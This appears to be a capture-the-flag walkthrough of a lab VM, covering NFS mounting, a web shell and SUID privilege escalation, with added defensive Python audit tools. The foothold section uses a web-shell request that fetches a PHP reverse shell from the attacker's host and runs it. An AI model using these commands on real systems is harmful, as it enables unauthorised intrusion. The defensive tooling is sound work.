IP address: 192.168.56.3

### Information gathering

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608865524235-74726992-d081-4cec-b021-d99840b6ef3f.png)

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608865555892-ecc055fb-6cda-4105-a05c-a729943a43c9.png)

Ports 2049 and 139 are open; look at those two first.

2049 is NFS ->

```
showmount -e 192.168.56.14
```

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866280687-d37f8fa5-bcb8-4255-ad60-da9dbf18749c.png)

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866402623-5f9596d2-2cc9-411c-beb2-fa6ae5cd87b3.png)

NFS mount of /home/user5:

```
mount -t nfs 192.168.56.14:/home/user5 /tmp
```

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866681894-c5927fca-f186-4bef-bf28-2e93d8ead0fe.png)

### Establish a foothold

Set that aside for now; directory brute-forcing port 80 turns up a cmd shell.

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866932440-db708e8d-c0e0-4aac-a7c5-54f4bf0b137e.png)
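Before following the web-shell path, a defender's counterpart to the NFS step above, added here as an example (not code from the original walkthrough): a small parser for `/etc/exports` syntax that flags exports open to every host, world-writable exports, `no_root_squash` and `insecure`. The sample export lines are constructed; the `/home/user5` line's host list and options are assumptions that would explain why the share could be mounted from an arbitrary client, not the target's real configuration.

```python
"""Audit NFS export definitions (exports(5) syntax) for risky client/option combinations."""

# Constructed sample in /etc/exports syntax. The /home/user5 line mirrors the
# export that was mountable in the walkthrough; its host list and options are
# assumptions, not the target's real configuration.
SAMPLE_EXPORTS = """
# constructed example
/home/user5  *(rw,sync,no_subtree_check)
/srv/backup  192.168.56.0/24(ro,sync,root_squash)
/export/lab  192.168.56.3 (rw,no_root_squash)
"""


def parse_export_line(line):
    """Return (path, [(client, [options])]) for one exports line, or None for blank/comment lines."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    parts = line.split()
    path, tokens = parts[0], parts[1:]
    clients = []
    if not tokens:
        # No client list at all: exportfs treats this as "every host".
        clients.append(("*", []))
    for tok in tokens:
        if tok.startswith("("):
            # "host (opts)" with a space before the parenthesis: exports(5) reads
            # this as host with default options PLUS a world export with opts.
            host, opts = "*", tok[1:-1]
        elif "(" in tok:
            host, opts = tok[:-1].split("(", 1)
        else:
            host, opts = tok, ""
        clients.append((host, [o for o in opts.split(",") if o]))
    return path, clients


def audit_client(host, opts):
    """Return the list of issue tags for one (client, options) pair."""
    issues = []
    world = host == "*"
    if world:
        issues.append("world")            # any client on any network may mount it
    if "no_root_squash" in opts:
        issues.append("no_root_squash")   # a remote root keeps uid 0 on the export
    if world and "rw" in opts:
        issues.append("world_rw")         # anyone can write, e.g. into a home directory
    if "insecure" in opts:
        issues.append("insecure")         # requests accepted from non-privileged ports
    return issues


def audit_exports(text):
    """Return [(path, client, [issues])] for every client entry with at least one issue."""
    findings = []
    for raw in text.splitlines():
        parsed = parse_export_line(raw)
        if parsed is None:
            continue
        path, clients = parsed
        for host, opts in clients:
            issues = audit_client(host, opts)
            if issues:
                findings.append((path, host, issues))
    return findings


if __name__ == "__main__":
    import sys
    source = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(source).read() if source else SAMPLE_EXPORTS
    for path, host, issues in audit_exports(text):
        print(f"{path:<20} {host:<20} {', '.join(issues)}")
```

Run it as `python3 exports_audit.py /etc/exports` on the NFS server itself: `showmount -e` from a client only reveals the client list per export, not whether `rw` or `no_root_squash` is set, so the option-level checks have to happen on the server. The third sample line is the well-known whitespace trap: a space between the host and the parenthesis silently turns the options into a world export.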
![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866958861-90984e93-2074-41e9-a1e4-856f58037490.png)

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608866980068-12f4df19-0419-42c1-bbd0-1c7a607fd74a.png)

Using it: on the attack machine run `python3 -m http.server`, then request

[http://192.168.56.14/shell.php?cmd=wget%20192.168.56.3:8000/php-reverse-shell.php%20-O%20/tmp/shell.php](http://192.168.56.14/shell.php?cmd=wget%20192.168.56.3:8000/php-reverse-shell.php%20-O%20/tmp/shell.php)

and run

```
shell.php?cmd=php+/tmp/shell.php
```

-> reverse shell

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608867235184-4a6129a2-56d6-4e6c-9a91-393a2e7a0d85.png)

### Privilege Escalation

```
find / -perm -4000 -type f 2>/dev/null
```

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608868057398-654707be-3831-4afb-ab04-74355e46747c.png)

Run ./script and run ./shell to find something.

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608868176140-d5e55afa-c723-4f71-8944-9f4da4852bc3.png)
![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1608868107634-c4a1c49c-915a-4a3e-a15d-0580faa6d174.png)

Okay, we get root, but there is something else to find: ./script behaves like ls.
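Looking back at the foothold step: the web shell was driven entirely through `cmd=` query strings, and those land verbatim in the web server's access log. As an added example (not part of the original write-up), this scanner parses Apache combined-format lines, decodes each query parameter and flags values that look like a command invocation or that contain shell metacharacters. The log lines are constructed: the two `/shell.php` requests reproduce the URLs used above, while the timestamps, sizes, user agent and the benign `search.php` request are made up.

```python
"""Scan Apache combined-format access logs for query parameters that carry shell commands."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed log lines. The two shell.php requests reproduce the URLs used in the
# walkthrough; timestamps, sizes and user agent are made up.
SAMPLE_LOG = """\
192.168.56.3 - - [25/Dec/2020:10:15:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
192.168.56.3 - - [25/Dec/2020:10:16:12 +0000] "GET /shell.php?cmd=wget%20192.168.56.3:8000/php-reverse-shell.php%20-O%20/tmp/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.3 - - [25/Dec/2020:10:16:40 +0000] "GET /shell.php?cmd=php+/tmp/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.10 - - [25/Dec/2020:10:17:03 +0000] "GET /search.php?q=php+tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# A downloader, interpreter or shell name (optionally with an absolute prefix) at
# the start of the value or after a shell separator, followed by an option, a
# path, a URL scheme or an IPv4 address. Requiring the argument keeps ordinary
# phrases such as "php tutorial" from matching.
_CMD_RE = re.compile(
    r"(?:^|[;&|`])\s*(?:/\S*/)?(?:wget|curl|nc|ncat|bash|sh|php|python\d?|perl)\s+"
    r"(?:-|/|\w+://|\d{1,3}(?:\.\d{1,3}){3})",
    re.IGNORECASE,
)
# Shell composition that has no place in an ordinary form value.
_META_RE = re.compile(r"[;|`]|\$\(|/dev/tcp/")


def classify_value(value):
    """Return a reason string if the decoded parameter value looks like a shell command, else None."""
    if _CMD_RE.search(value):
        return "command invocation"
    if _META_RE.search(value):
        return "shell metacharacters"
    return None


def scan_access_log(text):
    """Return one dict per suspicious (request, parameter) pair."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # parse_qsl percent-decodes and turns '+' into spaces, so the check sees
        # the same text the server-side script received.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                hits.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "path": url.path,
                    "param": name,
                    "value": value,
                    "reason": reason,
                })
    return hits


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    for h in scan_access_log(text):
        print(f"{h['time']} {h['client']} {h['path']} {h['param']}={h['value']!r} [{h['reason']}]")
```

Feed it a real log with `python3 scan_cmd_params.py < /var/log/apache2/access.log`. The limitation to keep in mind is that the access log only records the request line, so a web shell driven through a POST body would never show up here; for that, request-body logging (mod_security style) or host-side monitoring of the web server user spawning `/bin/sh` is needed.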
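The closing observation, that the SUID `./script` behaves like `ls`, is the classic pattern of a privileged helper that calls a command by bare name, so the name is resolved through the PATH of whoever runs it. As an added example (not the machine's actual binary or any code from the write-up), this audit locates SUID files the way the `find` command above does and inspects each one's NUL-terminated strings for known command names given without an absolute path, next to a `system` import and no `PATH` reset. `SAMPLE_BINARY` and `HARDENED_BINARY` are constructed byte strings standing in for a vulnerable and a fixed helper; the function names are this example's own.

```python
"""Find SUID binaries and flag ones that shell out to commands by bare name."""
import os
import re
import stat
import sys

# Commands a privileged helper commonly shells out to. Invoked by bare name,
# each is resolved through the PATH of whoever runs the helper.
COMMON_COMMANDS = {
    "ls", "cat", "cp", "mv", "rm", "id", "whoami", "ps", "netstat", "find",
    "grep", "sed", "awk", "tar", "chmod", "chown", "service", "sh", "bash",
    "mail", "date", "df", "ifconfig", "ip",
}

# Printable runs that end in a NUL byte, i.e. what a C string literal looks like
# in .rodata. Requiring the terminator keeps random code bytes out of the list.
_CSTRING_RE = re.compile(rb"[\x20-\x7e]{2,}(?=\x00)")

# Constructed stand-in for the vulnerable helper: a system() import and the
# bare command "ls", with no PATH reset. Not the real binary from the machine.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8   # ELF magic; rest of the header omitted
    + b"\x48\x83\xec\x08\x6c\x73\xc3"          # code bytes; the 'ls' here is not NUL-terminated
    + b"system\x00"                            # imported libc symbol
    + b"ls\x00"                                # argument handed to system(): bare name
    + b"/bin/cat /etc/motd\x00"                # absolute path, fine
    + b"usage: script\x00"
)

# Constructed stand-in for the fixed helper: absolute path plus a fixed PATH.
HARDENED_BINARY = b"system\x00/bin/ls\x00PATH=/usr/bin:/bin\x00"


def extract_strings(blob):
    """NUL-terminated printable strings in a binary image."""
    return [m.group().decode("ascii") for m in _CSTRING_RE.finditer(blob)]


def suspicious_commands(blob):
    """Strings whose first word is a known command given without an absolute path."""
    hits = []
    for s in extract_strings(blob):
        words = s.split()
        if words and words[0] in COMMON_COMMANDS:
            hits.append(s)
    return hits


def sets_path(blob):
    """True if the binary carries a PATH assignment (putenv-style "PATH=..." or setenv's "PATH")."""
    return any(s == "PATH" or s.startswith("PATH=") for s in extract_strings(blob))


def audit_blob(blob):
    """Summarise one binary image; 'risky' means bare command + system() + no PATH reset."""
    cmds = suspicious_commands(blob)
    calls_system = b"system\x00" in blob
    path_reset = sets_path(blob)
    return {
        "relative_commands": cmds,
        "calls_system": calls_system,
        "sets_path": path_reset,
        "risky": bool(cmds) and calls_system and not path_reset,
    }


def find_suid(root):
    """Regular files under root with the set-uid bit: the Python twin of find / -perm -4000 -type f."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(p)
    return sorted(found)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr/local/bin"
    for p in find_suid(root):
        try:
            with open(p, "rb") as fh:
                report = audit_blob(fh.read())
        except OSError as exc:
            print(f"{p}: unreadable ({exc})")
            continue
        flag = "RISKY" if report["risky"] else "ok"
        print(f"{flag:<5} {p} bare commands={report['relative_commands']} sets PATH={report['sets_path']}")
```

The string check is a heuristic for triage, not proof: confirm a hit by reading the call to `system` in the disassembly. The fix on the binary side is the one `HARDENED_BINARY` models, an absolute path for every command and an explicit `PATH`, and where the helper does not need the bit at all, dropping SUID removes the problem entirely.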